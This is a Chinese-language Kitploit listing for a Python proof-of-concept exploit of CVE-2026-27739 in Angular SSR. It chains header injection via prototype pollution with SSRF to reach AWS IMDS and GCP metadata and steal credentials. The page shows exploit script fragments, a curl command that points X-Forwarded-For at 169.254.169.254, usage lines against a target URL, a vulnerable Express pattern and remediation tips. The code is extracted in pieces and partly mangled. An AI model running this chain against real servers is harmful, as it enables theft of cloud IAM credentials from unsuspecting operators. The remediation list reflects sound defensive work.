Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-27739-POC — Python PoC 利用 Angular SSR 中的 CVE-2026-27739:通过原型污染进行头注入,并链接 SSRF 到 AWS IMDS/GCP 元数据以窃取凭证。 | Kitploit
工具/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试API 安全
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

Python PoC 利用 Angular SSR 中的 CVE-2026-27739:通过原型污染进行头注入,并链接 SSRF 到 AWS IMDS/GCP 元数据以窃取凭证。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. 通过原型污染进行头部注入 (CVSS: 7.5)

描述:Angular SSR 处理不安全的查询参数,影响原型链 影响:请求头操纵,潜在的 SSRF 链式利用

修复建议

  1. 移除/禁用 X-Forwarded-* 头部处理,或对已知代理进行白名单配置
  2. 在易受 SSRF 影响的操作之前实施严格的 URL 验证
  3. 使用 express-validator 或类似工具进行头部清理
  4. 禁用 AWS/GCP 元数据端点,或使用带跳数限制的 IMDSv2 """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF 与头部注入漏洞利用") parser.add_argument("target", help="目标 Angular SSR 应用程序 URL") parser.add_argument("--no-ssl-verify", action="store_true", help="禁用 SSL 验证")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] 目标: {args.target}")
print(f"[+] SSL 验证: {'已禁用' if args.no_ssl_verify else '已启用'}")

# 执行漏洞利用链
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() 使用方法 bash

基本 SSRF 测试

python3 angular_ssr_exploit.py https://target.com

针对自签名证书绕过 SSL

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify 工作原理 头部注入测试:发送原型污染载荷和不安全的转发头部,Angular SSR 可能以不安全的方式处理这些头部 SSRF 链:通过 X-Forwarded-For/X-Original-URL 测试对 AWS IMDS、GCP 元数据、localhost 服务的访问 IMDSv2 令牌提取:链式利用 SSRF 窃取 AWS 元数据令牌,进而获取 IAM 凭证 自动化报告:生成带有 CVSS 评分和 PoC 的渗透测试报告 技术细节 根本原因:Angular Universal SSR 应用通常将 req.headers 直接转发到内部 API,而未进行清理:

javascript

// 存在漏洞的 Angular SSR 模式 app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // 头部注入 });

下载工具